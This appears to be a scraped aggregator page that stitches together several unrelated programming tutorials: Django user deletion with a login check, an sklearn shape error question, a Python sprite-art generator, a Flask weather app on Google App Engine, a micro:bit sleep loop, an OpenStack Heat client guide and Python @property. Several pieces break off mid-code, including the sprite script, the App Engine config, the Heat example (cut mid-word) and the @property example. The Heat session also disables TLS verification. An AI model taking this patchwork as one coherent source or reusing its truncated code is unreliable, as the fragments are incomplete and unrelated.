The login, logout, and signup features covered earlier are relatively safe operations, but deleting data is dangerous: done wrong, it can cause irreversible damage. We therefore want to restrict who may perform it, for example requiring that the user be logged in and that only that same user may carry out the deletion. This is what permissions are for.

So we add a simple permission check in the view. Edit /userprofile/views.py:

```python
# /userprofile/views.py

from django.contrib.auth.models import User
# Import the decorator that requires login
from django.contrib.auth.decorators import login_required

...

@login_required(login_url='/userprofile/login/')
def user_delete(request, id):
    user = User.objects.get(id=id)
    # Verify that the logged-in user matches the user to be deleted
    if request.user == user:
        # Log out, delete the data, and return to the article list
        logout(request)
        user.delete()
        return redirect("article:article_list")
    else:
        return HttpResponse("You do not have permission to perform the delete operation.")
```

Let's analyze the code above:

@login_required is a Python decorator. A decorator adds functionality to a function without changing the function's own content. Concretely, @login_required requires the user to be logged in when user_delete() is called; if the user is not logged in, the function is not executed and the page is redirected to /userprofile/login/ .

A detailed explanation of decorators can be found here: How to understand Python decorators? A detailed explanation of @login_required is here: login_required

Once the decorator confirms that the user is logged in, user_delete() is allowed to run. The id of the user to delete is passed to the view through the request, and the if statement confirms that it matches the logged-in user; on success the user is logged out, the user data is deleted, and the browser is returned to the article list page.
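To illustrate how such a decorator works in general, here is a simplified sketch. This is not Django's actual @login_required implementation; the FakeRequest class and the return strings are made up for the example.

```python
from functools import wraps

def require_login(view_func):
    """Simplified sketch of a login-checking decorator (not Django's real code)."""
    @wraps(view_func)
    def wrapper(request, *args, **kwargs):
        if getattr(request, "user_is_authenticated", False):
            return view_func(request, *args, **kwargs)
        # An unauthenticated caller never reaches the view
        return "redirect to /userprofile/login/"
    return wrapper

@require_login
def user_delete(request, id):
    return "deleted user {}".format(id)

class FakeRequest:
    user_is_authenticated = True

print(user_delete(FakeRequest(), 7))  # deleted user 7
```

The decorated view keeps its own body unchanged; the wrapper simply runs a check before calling it, which is exactly the behaviour described above.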

Template and URL

Next, modify /templates/header.html to add a Delete User entry, and append the pop-up component code at the end:

```html
<!-- /templates/header.html -->

...
<div class="dropdown-menu" aria-labelledby="navbarDropdown">
    <!-- New -->
    <a class="dropdown-item" href="#" onclick="user_delete()">Delete user</a>
    <a class="dropdown-item" href='{% url "userprofile:logout" %}'>Log out</a>
</div>
...

<!-- New -->
{% if user.is_authenticated %}
<script>
    function user_delete() {
        // Call the layer pop-up component
        layer.open({
            title: "Confirm deletion",
            content: "Are you sure you want to delete the user data?",
            yes: function(index, layero) {
                location.href='{% url "userprofile:delete" user.id %}'
            },
        })
    }
</script>
{% endif %}
```

Because deleting a user requires the user to be logged in, the entry point is placed in the dropdown menu that only appears after login, which keeps the page cleaner. This is not necessarily the best choice; the more common approach is to put the delete function in a separate user profile page.

As with deleting articles, clicking the Delete User link calls the user_delete() function, which uses the pop-up component to make sure the user did not click by mistake; clicking the confirm button in the pop-up calls the delete view, which executes the business logic.

Note that the user_delete() function is wrapped in an if template statement. When no user is logged in, the page's user object has no id attribute, yet the function contains user.id , so Django would raise an error while parsing the template. The if statement guarantees that this piece of JavaScript is only parsed when a user is logged in, which avoids the problem.

Since base.html already loads the pop-up component module, and header.html is included in base.html , there is no need to load the component again.

Finally, write the route mapping in /userprofile/urls.py :

```python
# /userprofile/urls.py

urlpatterns = [
    ...
    # Delete a user
    path('delete/<int:id>/', views.user_delete, name='delete'),
]
```

Run the server to see the result. Log in and click Delete User in the dropdown at the top right:


(Screenshot: the delete-user confirmation pop-up)

Click confirm and the user data is successfully deleted.

Checking the database

We have already covered how to inspect database contents with SQLiteStudio; use it to make sure the data has really been erased from the database.

Open the project's db.sqlite3 file with SQLiteStudio and find the auth_user table, which shows the following:


(Screenshot: the auth_user table in SQLiteStudio)

You can see that the user dusai123 is indeed gone.

When verifying data-manipulation logic, SQLiteStudio helps you spot problems at a glance, so be sure to make good use of it.


Problem sklearn: Found arrays with inconsistent numbers of samples

this question seems to have been asked before, but I can't seem to comment for further clarification on the accepted answer and I couldn't figure out the solution provided.

I am trying to learn how to use sklearn with my own data. I essentially just got the annual % change in GDP for 2 different countries over the past 100 years. I am just trying to learn using a single variable for now. What I am essentially trying to do is use sklearn to predict what the GDP % change for country A will be given the percentage change in country B's GDP.

The problem is that I receive an error saying:

ValueError: Found arrays with inconsistent numbers of samples: [ 1 107]

Here is my code:

```python
import sklearn.linear_model as lm
import numpy as np
import scipy.stats as st
import matplotlib.pyplot as plt
import matplotlib.dates as mdates

def bytespdate2num(fmt, encoding='utf-8'):
    # Function to convert bytes to string for the dates
    strconverter = mdates.strpdate2num(fmt)
    def bytesconverter(b):
        s = b.decode(encoding)
        return strconverter(s)
    return bytesconverter

dataCSV = open('combined_data.csv')
comb_data = []
for line in dataCSV:
    comb_data.append(line)

date, chngdpchange, ausgdpchange = np.loadtxt(comb_data, delimiter=',', unpack=True,
                                              converters={0: bytespdate2num('%d/%m/%Y')})

chntrain = chngdpchange[:-1]
chntest = chngdpchange[-1:]
austrain = ausgdpchange[:-1]
austest = ausgdpchange[-1:]

regr = lm.LinearRegression()
regr.fit(chntrain, austrain)

print('Coefficients: \n', regr.coef_)
print("Residual sum of squares: %.2f" % np.mean((regr.predict(chntest) - austest) ** 2))
print('Variance score: %.2f' % regr.score(chntest, austest))

plt.scatter(chntest, austest, color='black')
plt.plot(chntest, regr.predict(chntest), color='blue')
plt.xticks(())
plt.yticks(())
plt.show()
```

What am I doing wrong? I essentially tried to apply the sklearn tutorial (They used some diabetes data set) to my own simple data. My data just contains the date, country A's % change in GDP for that specific year, and country B's % change in GDP for that same year.

I tried the solutions here and here (basically trying to find out more about the solution in the first link), but I just receive the exact same error.

Here is the full traceback in case you want to see it:

```
Traceback (most recent call last):
  File "D:\My Stuff\Dropbox\python\Python projects\test regression\tester.py", line 34, in <module>
    regr.fit(chntrain, austrain)
  File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\linear_model\base.py", line 376, in fit
    y_numeric=True, multi_output=True)
  File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\utils\validation.py", line 454, in check_X_y
    check_consistent_length(X, y)
  File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\utils\validation.py", line 174, in check_consistent_length
    "%s" % str(uniques))
ValueError: Found arrays with inconsistent numbers of samples: [  1 107]
```
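For context (this is not part of the original question): this error typically means scikit-learn received a 1-D array where it expected a 2-D feature matrix of shape (n_samples, n_features), and reshaping the input is the usual fix. A minimal sketch with hypothetical numbers standing in for the GDP series:

```python
import numpy as np
from sklearn.linear_model import LinearRegression

# Hypothetical 1-D data standing in for the two GDP series in the question
x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
y = np.array([2.1, 3.9, 6.2, 8.0, 9.8])

# fit() expects X with shape (n_samples, n_features); reshape the 1-D array
X = x.reshape(-1, 1)

model = LinearRegression()
model.fit(X, y)
print(X.shape)  # (5, 1)
print(float(model.coef_[0]))
```

Applying the same reshape to chntrain and chntest before calling fit() and predict() should resolve the shape mismatch.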
          How to Create Generative Art In Less Than 100 Lines Of Code      Cache   Translate Page      
What is generative art?

Generative art is the output of a system that makes its own decisions about the piece, rather than a human. The system could be as simple as a single Python program, as long as it has rules and some aspect of randomness.

With programming, it’s pretty straightforward to come up with rules and constraints. That’s all conditional statements are. Having said that, finding ways to make these rules create something interesting can be tricky.


How to Create Generative Art In Less Than 100 Lines Of Code
Conway’s Game of Life (labeled for reuse)

The Game of Life is a famous set of four simple rules that determine the “birth” and “death” of each cell in the system. Each of the rules play a part in advancing the system through each generation. Although the rules are simple and easy to understand, complex patterns quickly begin to emerge and ultimately form fascinating results.

Rules may be responsible for creating the foundation of something interesting, but even something as exciting as Conway’s Game of Life is predictable. Since the four rules are the determining factors for each generation, the way to produce unforeseeable results is to introduce randomization at the starting state of the cells. Beginning with a random matrix will make each execution unique without needing to change the rules.
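To make this concrete, here is a minimal sketch (not from the original article) of one generation update under Conway's rules, starting from a random grid; the toroidal wrap-around at the edges is a choice made for this example:

```python
import random

def step(grid):
    """Compute the next generation of Conway's Game of Life on a wrapping grid."""
    rows, cols = len(grid), len(grid[0])
    new = [[0] * cols for _ in range(rows)]
    for r in range(rows):
        for c in range(cols):
            # Count the eight neighbours, wrapping around the edges
            neighbours = sum(
                grid[(r + dr) % rows][(c + dc) % cols]
                for dr in (-1, 0, 1) for dc in (-1, 0, 1)
                if (dr, dc) != (0, 0)
            )
            # Survival: 2 or 3 neighbours; birth: exactly 3 neighbours
            if grid[r][c] == 1:
                new[r][c] = 1 if neighbours in (2, 3) else 0
            else:
                new[r][c] = 1 if neighbours == 3 else 0
    return new

# A random starting state makes each run statistically unique
grid = [[random.randint(0, 1) for _ in range(8)] for _ in range(8)]
grid = step(grid)
print(len(grid), len(grid[0]))  # 8 8
```

The four rules are fixed; only the random initial matrix changes between runs, which is exactly the predictability-plus-randomness combination described above.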

The best examples of generative art are the ones that find a combination of predictability and randomness in order to create something interesting that is also statistically irreproducible.

Why should you tryit?

Not all side projects are created equal, and generative art may not be something you’re inclined to spend time on. If you decide to work on a project however, then you can expect these benefits:

Experience ― Generative art is just another opportunity to hone some new and old skills. It can serve as a gateway to practicing concepts like algorithms, data structures, and even new languages.

Tangible Results ― In the programming world we rarely get to see anything physical come out of our efforts, or at least I don’t. Right now I have a few posters in my living room displaying prints of my generative art and I love that programming is responsible for that.

Attractive Projects ― We’ve all had the experience of explaining a personal project to someone, possibly even during an interview, without an easy way to convey the effort and results of the project. Generative art speaks for itself, and most anyone will be impressed by your creations, even if they can’t fully understand the methods.

Where should you start?

Getting started with generative art is the same process as any project, the most crucial step is to come up with an idea or find one to build upon. Once you have a goal in mind, then you can start working on the technology required to achieve it.

Most of my generative art projects have been accomplished in Python. It’s a fairly easy language to get used to and it has some incredible packages available to help with image manipulation, such as Pillow .

Luckily for you, there’s no need to search very far for a starting point, because I’ve provided some code down below for you to play with.

Sprite Generator

This project started when I saw a post showing off a sprite generator written in JavaScript. The program created 5x5 pixel art sprites with some random color options and its output resembled multi-colored space invaders.

I knew that I wanted to practice image manipulation in Python, so I figured I could just try to recreate this concept on my own. Additionally, I thought that I could expand on it since the original project was so limited in the size of the sprites. I wanted to be able to specify not only the size, but also the number of them and even the size of the image.

Here’s a look at two different outputs from the solution I ended up with:


How to Create Generative Art In Less Than 100 Lines Of Code
7x7 30 1900
How to Create Generative Art In Less Than 100 Lines Of Code
43x43 6 1900

These two images don’t resemble each other at all, but they’re both the results of the same system. Not to mention, due to the complexity of the image and the randomness of the sprite generation, there is an extremely high probability that even with the same arguments, these images will forever be one of a kind. I love it.

The environment

If you want to start playing around with the sprite generator, there’s a little foundation work that has to be done first.

Setting up a proper environment with Python can be tricky. If you haven’t worked with Python before, you’ll probably need to download Python 2.7.10. I initially had trouble setting up the environment, so if you start running into problems, you can do what I did and look into virtual environments . Last but not least, make sure you have Pillow installed as well.

Once you have the environment set up, you can copy my code into a file with extension.py and execute with the following command:

python spritething.py [SPRITE_DIMENSIONS] [NUMBER] [IMAGE_SIZE]

For example, the command to create the first matrix of sprites from above would be:

python spritething.py 7 30 1900

The code

```python
import PIL, random, sys
from PIL import Image, ImageDraw

origDimension = 1500

r = lambda: random.randint(50, 215)
rc = lambda: (r(), r(), r())

listSym = []

def create_square(border, draw, randColor, element, size):
    if (element == int(size/2)):
        draw.rectangle(border, randColor)
    elif (len(listSym) == element+1):
        draw.rectangle(border, listSym.pop())
    else:
        listSym.append(randColor)
        draw.rectangle(border, randColor)

def create_invader(border, draw, size):
    x0, y0, x1, y1 = border
    squareSize = (x1-x0)/size
    randColors = [rc(), rc(), rc(), (0,0,0), (0,0,0), (0,0,0)]
    i = 1
    for y in range(0, size):
        i *= -1
        element = 0
        for x in range(0, size):
            topLeftX = x*squareSize + x0
            topLeftY = y*squareSize + y0
            botRightX = topLeftX + squareSize
            botRightY = topLeftY + squareSize
            create_square((topLeftX, topLeftY, botRightX, botRightY), draw, random.choice(randColors), element, size)
            if (element == int(size/2) or element == 0):
                i *= -1
            element += i

def main(size, invaders, imgSize):
    origDimension = imgSize
    origImage = Image.new('RGB', (origDimension, origDimension))
    draw = ImageDraw.Draw(origImage)
    invaderSize = origDimension/invaders
    padding = invaderSize/size
    for x in range(0, invaders):
        for y in range(0, invaders):
            topLeftX = x*invaderSize + padding/2
            topLeftY = y*invaderSize + padding/2
            botRightX = topLeftX + invaderSize - padding
            botRightY = topLeftY + invaderSize - padding
            create_invader((topLeftX, topLeftY, botRightX, botRightY), draw, size)
```
          How to build a web app using Python’s Flask and Google App Engine      Cache   Translate Page      

How to build a web app using Python’s Flask and Google App Engine

If you want to build web apps in a very short amount of time using python, then Flask is a fantastic option.

Flask is a small and powerful web framework (also known as “ microframework ”). It is also very easy to learn and simple to code. Based on my personal experience, it was easy to start as a beginner.

Before this project, my knowledge of Python was mostly limited to Data Science. Yet, I was able to build this app and create this tutorial in just a few hours.

In this tutorial, I’ll show you how to build a simple weather app with some dynamic content using an API. This tutorial is a great starting point for beginners. You will learn to build dynamic content from APIs and deploying it on Google Cloud.

The end product can be viewed here .


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine

To create a weather app, we will need to request an API key from Open Weather Map . The free version allows up to 60 calls per minute, which is more than enough for this app. The Open Weather Map conditions icons are not very pretty. We will replace them with some of the 200+ weather icons from Erik Flowers instead.


How to build a web app using Python’s Flask and Google App Engine

This tutorial will also cover: (1) basic CSS design, (2) basic HTML with Jinja, and (3) deploying a Flask app on Google Cloud.

The steps we’ll take are listed below:

Step 0: Installing Flask (this tutorial doesn’t cover Python and PIP installation)
Step 1: Building the App structure
Step 2: Creating the Main App code with the API request
Step 3: Creating the 2 pages for the App (Main and Result) with Jinja, HTML, and CSS
Step 4: Deploying and testing on your local laptop
Step 5: Deploying on Google Cloud.

Step 0 ― Installing Flask and the libraries we will use in a virtual environment.

We’ll build this project using a virtual environment. But why do we need one?

With virtual environments, you create a local environment specific for each projects. You can choose libraries you want to use without impacting your laptop environment. As you code more projects on your laptop, each project will need different libraries. With a different virtual environment for each project, you won’t have conflicts between your system and your projects or between projects.

Run Command Prompt (cmd.exe) with administrator privileges. Not using admin privileges will prevent you from using pip.
How to build a web app using Python’s Flask and Google App Engine
(Optional) Install virtualenv and virtualenvwrapper-win with PIP. If you already have these system libraries, please jump to the next step.

```shell
#Optional
pip install virtualenvwrapper-win
pip install virtualenv
```
How to build a web app using Python’s Flask and Google App Engine
Create your folder with the name “WeatherApp” and make a virtual environment with the name “venv” (it can take a bit of time)

```shell
#Mandatory
mkdir WeatherApp
cd WeatherApp
virtualenv venv
```
How to build a web app using Python’s Flask and Google App Engine
Activate your virtual environment with “call” on Windows (same as “source” for Linux). This step changes your environment from the system to the project local environment.

```shell
call venv\Scripts\activate.bat
```
How to build a web app using Python’s Flask and Google App Engine
Create a requirements.txt file that includes Flask and the other libraries we will need in your WeatherApp folder, then save the file. The requirements file is a great tool to also keep track of the libraries you are using in your project.

```
Flask==0.12.3
click==6.7
gunicorn==19.7.1
itsdangerous==0.24
Jinja2==2.9.6
MarkupSafe==1.0
pytz==2017.2
requests==2.13.0
Werkzeug==0.12.1
```
How to build a web app using Python’s Flask and Google App Engine
Install the requirements and their dependencies. You are now ready to build your WeatherApp. This is the final step to create your local environment.

```shell
pip install -r requirements.txt
```
How to build a web app using Python’s Flask and Google App Engine
Step 1 ― Building the App structure

You have taken care of the local environment. You can now focus on developing your application. This step is to make sure the proper folder and file structure is in place. The next step will take care of the backend code.

Create two Python files (main.py, weather.py) and two folders (static with a subfolder img, templates).
How to build a web app using Python’s Flask and Google App Engine
Step 2 ― Creating the Main App code with the API request (Backend)

With the structure set up, you can start coding the backend of your application. Flask’s “Hello world” example only uses one Python file. This tutorial uses two files to get you comfortable with importing functions to your main app.

The main.py is the server that routes the user to the homepage and to the result page. The weather.py file creates a function with API that retrieves the weather data based on the city selected. The function populates the resulting page.

Edit main.py with the following code and save

```python
#!/usr/bin/env python
from pprint import pprint as pp
from flask import Flask, flash, redirect, render_template, request, url_for
from weather import query_api

app = Flask(__name__)

@app.route('/')
def index():
    return render_template(
        'weather.html',
        data=[{'name':'Toronto'}, {'name':'Montreal'}, {'name':'Calgary'},
              {'name':'Ottawa'}, {'name':'Edmonton'}, {'name':'Mississauga'},
              {'name':'Winnipeg'}, {'name':'Vancouver'}, {'name':'Brampton'},
              {'name':'Quebec'}])

@app.route("/result", methods=['GET', 'POST'])
def result():
    data = []
    error = None
    select = request.form.get('comp_select')
    resp = query_api(select)
    pp(resp)
    if resp:
        data.append(resp)
    if len(data) != 2:
        error = 'Bad Response from Weather API'
    return render_template(
        'result.html',
        data=data,
        error=error)

if __name__ == '__main__':
    app.run(debug=True)
```

Request a free API key on Open Weather Map
How to build a web app using Python’s Flask and Google App Engine
Edit weather.py with the following code (updating the API_KEY) and save

```python
from datetime import datetime
import os
import pytz
import requests
import math

API_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXX'
API_URL = ('http://api.openweathermap.org/data/2.5/weather?q={}&mode=json&units=metric&appid={}')

def query_api(city):
    try:
        print(API_URL.format(city, API_KEY))
        data = requests.get(API_URL.format(city, API_KEY)).json()
    except Exception as exc:
        print(exc)
        data = None
    return data
```

Step 3 ― Creating pages with Jinja, HTML, and CSS (Frontend)

This step is about creating what the user will see.

The HTML pages weather and result are the ones the backend main.py will route to and give the visual structure. The CSS file will bring the final touch. There is no JavaScript in this tutorial (the front end is pure HTML and CSS).

It was my first time using the Jinja2 template library to populate the HTML file. It surprised me how easy it was to bring dynamic images or use functions (e.g. rounding weather). Definitely a fantastic template engine.

Create the first HTML file in the templates folder (weather.html)

```html
<!doctype html>
<link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}">
<div class="center-on-page">
  <h1>Weather in a City</h1>
  <form class="form-inline" method="POST" action="{{ url_for('result') }}">
    <div class="select">
      <select name="comp_select" class="selectpicker form-control">
        {% for o in data %}
        <option value="{{ o.name }}">{{ o.name }}</option>
        {% endfor %}
      </select>
    </div>
    <button type="submit" class="btn">Go</button>
  </form>
</div>
```

Create the second HTML file in the templates folder (result.html)

```html
<!doctype html>
<link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}">
<div class="center-on-page">
  {% for d in data %}
  {% set my_string = "static/img/" + d['weather'][0]['icon'] + ".svg" %}
  <h1>
    <img src="{{ my_string }}" class="svg" fill="white" height="100" vertical-align="middle" width="100">
  </h1>
  <h1>Weather</h1>
  <h1>{{ d['name'] }}, {{ d['sys']['country'] }}</h1>
  <h1>{{ d['main']['temp']|round|int }} °C</h1>
  {% endfor %}
</div>
```
How to build a web app using Python’s Flask and Google App Engine
Add a CSS file in the static folder (style.css)

```css
body {
  color: #161616;
  font-family: 'Roboto', sans-serif;
  text-align: center;
  background-color: currentColor;
}

.center-on-page {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
}

h1 {
  text-align: center;
  color: #FFFFFF;
}

img {
  vertical-align: middle;
}

/* Reset Select */
select {
  -webkit-appearance: none;
  -moz-appearance: none;
  -ms-appearance: none;
  appearance: none;
  outline: 0;
  box-shadow: none;
  border: 0 !important;
  background: #2c3e50;
  background-image: none;
}

/* Custom Select */
.select {
  position: relative;
  display: block;
  width: 20em;
  height: 3em;
  line-height: 3;
  background: #2c3e50;
  overflow: hidden;
  border-radius: .25em;
}

select {
  width: 100%;
  height: 100%;
  margin: 0;
  padding: 0 0 0 .5em;
  color: #fff;
  cursor: pointer;
}

select::-ms-expand {
  display: none;
}

/* Arrow */
.select::after {
  content: '\25BC';
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  padding: 0 1em;
  background: #34495e;
  pointer-events: none;
}

/* Transition */
.select:hover::after {
  color: #f39c12;
}

.select::after {
  -webkit-transition: .25s all ease;
  -o-transition: .25s all ease;
  transition: .25s all ease;
}

button {
  -webkit-appearance: none;
  -moz-appearance: none;
  -ms-appearance: none;
  appearance: none;
  outline: 0;
  box-shadow: none;
  border: 0 !important;
  background: #2c3e50;
  background-image: none;
  width: 100%;
  height: 40px;
  margin: 0;
  margin-top: 20px;
  color: #fff;
  cursor: pointer;
  border-radius: .25em;
}

.button:hover {
  color: #f39c12;
}
```

Download the images in the img subfolder in static

Link with the images on Github :


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 4 ― Deploying and testinglocally

At this stage, you have set up the environment, the structure, the backend, and the frontend. The only thing left is to launch your app and to enjoy it on your localhost.

Just launch the main.py with Python

```shell
python main.py
```

Go to the localhost link proposed on cmd with your Web Browser (Chrome, Mozilla, etc.). You should see your new weather app live on your local laptop :)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 5 ― Deploying on GoogleCloud

This last step is for sharing your app with the world. It’s important to note that there are plenty of providers for web apps built using Flask. Google Cloud is just one of many. This article does not cover some of the others like AWS, Azure, Heroku…

If the community is interested, I can provide the steps of the other cloud providers in another article and some comparison (pricing, limitations, etc.).

To deploy your app on Google Cloud you will need to 1) Install the SDK, 2) Create a new project, 3) Create 3 local files, 4) Deploy and test online.

Install the SDK following Google’s instructions

Connect to your Google Cloud Account (use a $300 coupon if you haven’t already)

Create a new project and save the project id (wait a bit until the new project is provisioned)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Create an app.yaml file in your main folder with the following code:

```yaml
runtime: python27
api_version: 1
threadsafe: true

handlers:
- url: /static
  static_dir: static
- url: /.*
  script: main.app

libraries:
- name: ssl
  version: latest
```

Create an appengine_config.py file in your main folder with the following code:

```python
from google.appengine.ext import vendor
```
Micro:bit uPython: Pausing the program execution


Introduction

In this short tutorial we will check how we can pause the execution of a program on the Micro:bit, running MicroPython.

In order to be able to pause the execution, we will use the sleep function of the microbit module. This function receives as input the number of milliseconds to pause the execution.

In our simple example, we will do a loop and print the current iteration value, waiting one second at the end of each iteration.

The code

As mentioned before, the sleep function is available on the microbit module. So, we need to import the function first, before using it.

from microbit import sleep

After that, we will specify our loop. We will do a simple for in loop between 0 and 9. We will use the range function to generate the list of numbers between 0 and 9 and iterate through each number of the list.

Note that the range function receives as its first parameter the starting value (included) and as its second parameter the stopping value (excluded). This is why we pass 10 as the second argument of the range function, to generate the numbers between 0 and 9.
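As a quick check of those endpoints (a tiny sketch, not part of the original tutorial):

```python
# range(0, 10) includes the start (0) and excludes the stop (10)
nums = list(range(0, 10))
print(nums[0], nums[-1], len(nums))  # 0 9 10
```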

```python
for i in range(0, 10):
    # loop body
```

Then, inside the loop, we will simply print the current value and then pause the execution for 1 second. Since the sleep function receives the time in milliseconds, we need to pass to it the value 1000.

```python
print(i)
sleep(1000)
```

The final code can be seen below.

```python
from microbit import sleep

for i in range(0, 10):
    print(i)
    sleep(1000)
```

Testing the code

To test the code, simply upload the previous script to your Micro:bit board using a tool of your choice. In my case, I’m using uPyCraft , a MicroPython IDE.

After running the program, you should get an output similar to figure 1, which shows the numbers getting printed. During the program execution, there should be a 1 second delay between each print.


Micro:bit uPython: Pausing the program execution

Figure 1 Output of the program.


OpenStack: Heat Python Tutorial

In this tutorial, we’ll focus on how to interact with OpenStack Heat using python. Before deep diving into Heat Python examples, I suggest being familiar with Heat itself and more specifically:

Templates Basic operations: create/delete/update stack

Still here? Let's go.

Set up Heat client

In order to work with Heat, we need first to create a heat client.

```python
from heatclient import client as heat_client
from keystoneauth1 import loading
from keystoneauth1 import session

kwargs = {
    'auth_url': <YOUR_AUTH_URL>,
    'username': <YOUR_USERNAME>,
    'password': <YOUR_PASSWORD>,
    'project_name': <YOUR_PROJECT_NAME>,
    'user_domain_name': <YOUR_USER_DOMAIN_NAME>,
    'project_domain_name': <YOUR_PROJECT_DOMAIN_NAME>,
}

loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(**kwargs)
sess = session.Session(auth=auth, verify=False)

client = heat_client.Client('1', session=sess,
                            endpoint_type='public',
                            service_type='orchestration')
```

Note: if for some reason you are using auth v2 and not v3, you can drop user_domain_name and project_domain_name.

You should be able to use your heat client now. Let’s test it.

List Stacks

```python
for stack in client.stacks.list():
    print(stack)
```

```
Stack {
  u'description': u'',
  u'parent': None,
  u'deletion_time': None,
  u'stack_name': u'default',
  u'stack_user_project_id': u'48babe632349f9b87ac3513',
  u'stack_status_reason': u'Stack CREATE completed successfully',
  u'creation_time': u'2018-10-25T17:02:52Z',
  u'links': [
    {
      u'href': u'https://my-server',
      u'rel': u'self'
    }
  ],
  u'updated_time': None,
  u'stack_owner': None,
  u'stack_status': u'CREATE_COMPLETE',
  u'id': u'b90d0e57-05a8-4700-b2f9-905497abe673',
  u'tags': None
}
```

The list method provides us with a generator that returns Stack objects. Each Stack object contains plenty of information: the name of the stack, details on the parent stack if it is a nested stack, the creation time, and, probably the most useful one, the stack status, which allows us to check if the stack is ready to use.
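As an illustration, stack_status can be polled until the stack is ready. This helper is a sketch, not part of the heatclient API; it only assumes the client object built earlier and the attributes shown in the output above.

```python
import time

def wait_for_stack(client, name, timeout=600, interval=10):
    """Poll a stack until it reaches a terminal status (sketch, not official API)."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        stack = client.stacks.get(name)
        if stack.stack_status == 'CREATE_COMPLETE':
            return stack
        if stack.stack_status == 'CREATE_FAILED':
            raise RuntimeError(stack.stack_status_reason)
        time.sleep(interval)
    raise TimeoutError('stack %s not ready after %ss' % (name, timeout))
```

A caller would then do something like `stack = wait_for_stack(client, 'default')` before using the stack's resources.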

Create a Stack

In order to create a stack, we first need a template that will define how our stack would look like. I’m going to assume here that you read the template guide and you have a basic (or complex) template ready for use.

To load a template, heat developers have provided us with the get_template_contents method

```python
from heatclient.common import template_utils
import yaml

template_path = '/home/mario/my_template'

# Load the template
_files, template = template_utils.get_template_contents(template_path)

# Serialize it into a stream
s_template = yaml.safe_dump(template)

client.stacks.create(stack_name='my_stack', template=s_template)
```

Stack with parameters

In reality, there is a good chance your template includes several parameters that you have to pass when creating the stack. For example, take a look at this template

```yaml
heat_template_version: 2013-05-23

description: My Awesome Stack

parameters:
  flavor:
    type: string
  image:
    type: string
```

In order for the stack creation to be completed successfully, we need to provide the parameters flavor and image . This will require a slight change in our code

```python
parameters = {'flavor': 'm1.large', 'image': 'Fedora-30'}

client.stacks.create(stack_name='my_stack',
                     template=s_template,
                     parameters=parameters)
```

We created a dictionary with the required parameters and passed it to the stack create method. When more parameters added to your template, all you need to do is to extend the ‘parameters’ dictionary, without modifying the create call.

Inspect stack resources

Inspecting the stack as we previously did might not be enough in certain scenarios. Imagine you want to use some resources as soon as they are ready, regardless of overall stack readiness. In that case, you'll want to check the status of a single resource. The following code will allow you to achieve that

```python
stack = client.stacks.get("my_stack")
res = client.resources.get(stack.id, 'fip')

if res.resource_status == 'CREATE_COMPLETE':
    print("You may proceed :)")
```

So what just happened? First, we need to obtain the ID of our stack. In order to do that, we use the stacks get method, passing our stack's name.

Now that we have the stack ID we can use it and the resource name we are interested in (‘f
          Python @Property Explained A Simplified Guide      Cache   Translate Page      

A Python @property decorator lets a method be accessed as an attribute instead of as a method call with '()'. Today, you will gain an understanding of why it is really needed, in what situations you can use it, and how to actually use it.

Contents

1. Introduction

2. When to use @property?

3. The setter method: When to use it and How to define one?

1. Introduction

In well-written Python code, you might have noticed a @property decorator just before a method definition. In this guide, you will understand clearly what exactly the Python @property does, when to use it, and how to use it. This guide, however, assumes that you have a basic idea about what Python classes are, because @property is typically used inside one.

So, what does the @property do?

The @property lets a method be accessed as an attribute instead of as a method call with '()'. But why is it really needed, and in what situations can you use it?

To understand this, let’s create a Person class that contains the first , last and fullname of the person as attributes and has an email() method that provides the person’s email.

```python
class Person():

    def __init__(self, firstname, lastname):
        self.first = firstname
        self.last = lastname
        self.fullname = self.first + ' ' + self.last

    def email(self):
        return '{}.{}@email.com'.format(self.first, self.last)
```

Let’s create an instance of the Person ‘selva prabhakaran’ and print the attributes.

```python
# Create a Person object
person = Person('selva', 'prabhakaran')

print(person.first)     #> selva
print(person.last)      #> prabhakaran
print(person.fullname)  #> selva prabhakaran
print(person.email())   #> selva.prabhakaran@email.com
```

2. When to use @property?

So far so good.

Now, somehow you decide to change the last name of the person.

Here is a fun fact about python classes: If you change the value of an attribute inside a class, the other attributes that are derived from the attribute you just changed don’t automatically update.

For example: by changing self.last , you might expect the self.fullname attribute, which is derived from self.last , to update. But unexpectedly it doesn’t. This can provide potentially misleading information about the person .

However, notice the email() works as intended, even though it is derived from self.last .

# Changing the `last` name does not change `self.fullname`, but email() works
person.last = 'prasanna'
print(person.last)
#> prasanna
print(person.fullname)
#> selva prabhakaran
print(person.email())
#> selva.prasanna@email.com

So, a probable solution would be to convert the self.fullname attribute to a fullname() method , so it will provide the correct value like the email() method did. Let’s do it.

# Converting fullname to a method provides the right fullname
# But it breaks old code that used the fullname attribute without the `()`
class Person():
    def __init__(self, firstname, lastname):
        self.first = firstname
        self.last = lastname

    def fullname(self):
        return self.first + ' ' + self.last

    def email(self):
        return '{}.{}@email.com'.format(self.first, self.last)

person = Person('selva', 'prabhakaran')
print(person.fullname())
#> selva prabhakaran

# change last name to Prasanna
person.last = 'prasanna'
print(person.fullname())
#> selva prasanna

Now the convert to method solution works.

But there is a problem.

Since we are using person.fullname() method with a '()' instead of person.fullname as attribute, it will break whatever code that used the self.fullname attribute. If you are building a product/tool, the chances are, other developers and users of your module used it at some point and all their code will break as well.

So a better solution (without breaking your user’s code) is to convert the method as a property by adding a @property decorator before the method’s definition. By doing this, the fullname() method can be accessed as an attribute instead of as a method with '()' . See example below.

# Adding @property provides the right fullname and does not break code!
class Person():
    def __init__(self, firstname, lastname):
        self.first = firstname
        self.last = lastname

    @property
    def fullname(self):
        return self.first + ' ' + self.last

    def email(self):
        return '{}.{}@email.com'.format(self.first, self.last)

# Init a Person
